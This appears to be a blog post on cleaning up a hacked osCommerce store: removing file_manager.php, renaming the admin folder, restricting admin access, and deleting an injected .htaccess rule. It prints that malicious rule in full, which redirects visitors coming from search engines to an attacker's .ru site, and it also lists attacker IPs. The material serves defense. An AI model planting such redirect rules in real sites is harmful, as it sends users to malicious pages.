If you’re using osCommerce, the first thing you have to do is to install the latest version. Second, remove the file_manager.php file and then rename your admin directory to something else: login via FTP or SSH(recommended) to do so:
ftp> delete admin/file_manager.php
ftp> rename admin admin-random-folder-name
ftp> cd admin-random-folder-name/includes
ftp> get configure.php
ftp> rename admin admin-random-folder-name
ftp> cd admin-random-folder-name/includes
ftp> get configure.php
Once you do that, modify your configure.php to point the admin folder to the new location.
define(‘DIR_WS_ADMIN’, ‘/admin-random-folder-name/’);
define(‘DIR_FS_ADMIN’, DIR_FS_DOCUMENT_ROOT . DIR_WS_ADMIN);
define(‘DIR_FS_ADMIN’, DIR_FS_DOCUMENT_ROOT . DIR_WS_ADMIN);
If you can, also restrict access to the admin directory to just a few IP addresses (via .htaccess):
deny from all
allow from
allow from
Next step is to remove the malicious entry from the .htaccess file, which generally looks like this:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
..
RewriteRule ^(.*)$ http://devisionnetwork.ru/suomi/index.php [R=301,L]
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
..
RewriteRule ^(.*)$ http://devisionnetwork.ru/suomi/index.php [R=301,L]
Make sure to look for backdoors – scripts that would allow the attackers access back to your site
As far as the attacks go, they’re being managed by at least two IP addresses (91.204.48.37 and 94.103.151.195).
No comments:
Post a Comment